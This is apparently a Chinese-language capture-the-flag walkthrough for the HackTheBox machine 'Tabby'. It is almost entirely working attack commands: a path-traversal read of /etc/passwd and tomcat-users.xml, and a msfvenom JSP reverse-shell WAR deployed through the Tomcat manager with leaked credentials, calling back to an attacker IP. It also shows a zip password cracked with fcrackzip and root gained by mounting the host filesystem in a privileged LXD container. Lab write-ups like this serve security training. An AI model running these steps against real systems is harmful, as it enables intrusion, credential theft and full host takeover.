端口扫描
nmap -sC -sV -T5 10.10.10.194 -oN nmap.txt
站点文件包含
#添加主机解析
echo "10.10.10.194 megahosting.htb">>/etc/hosts
发现存在文件包含漏洞
http://megahosting.htb/news.php?file=../../../../etc/passwd
文件上传
对10.10.10.194:8080进行wfuzz
XXX/tomcat-users.xml的文件会存在 账户密码
故
wfuzz -u "http://megahosting.htb/news.php?file=../../../../../../usr/share/tomcat9/FUZZ/tomcat-users.xml" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 0
由tomcat-users.xmltomcat文件可知tomcat只有admin-gui,manager-script两个角色
没有manager-gui角色
故无法登陆http://10.10.10.194/manager/html
manager-gui — Access to the HTML interface.
manager-status — Access to the "Server Status" page only.
manager-script — Access to the tools-friendly plain text interface that is described in this document, and to the "Server Status" page.
manager-jmx — Access to JMX proxy interface and to the "Server Status" page.
admin-gui - use this role for the graphical web interface.
admin-script - use this role for the scripting web interface.
使用host-manager添加虚拟主机失败 [但是tomcat又存在admin-gui角色,或许可以部署成功…]
发现存在manager-script角色,可使用curl命令上传文件部署shell
- 为什么部署在http://localhost:8080/manager/text/deploy?path=下?
由官方文档可知
shell生成
#msfvenom -l payloads |grep reverse_tcp #查看某一payload
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.51 lport=4444 -f war > get.war
上传shell
curl -f -T get.war -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/get.war"
#查看shell上传是否成功
http://10.10.10.194:8080/manager/text/list
侦听4444端口,获得shell
文件爆破
文件下载
10.10.10.194/files/16162020_backup.zip
文件爆破
fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
获得ash密码
tomcat@tabby:/home$ su ash
su ash
Password: admin@it
ash@tabby:/home$ whoami
whoami
提权
LinEnum脚本枚举
LXD提权
#攻击机
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python -m SimpleHTTPServer
#目标机
cd /tmp
wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz
#创建容器,并指定别名 myimage
lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
#挂载 /mnt/root
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
cd /mnt/root/root
ls
flag.txt
cat flag.txt
其他
- 若存在admin-script角色,使用命令部署
#Example command:
curl -u test:test http://localhost:8080/host-manager/text/add?name=www.awesomeserver.com&aliases=awesomeserver.com&appBase/mnt/appDir&deployOnStartup=true
- 多阅读官方文档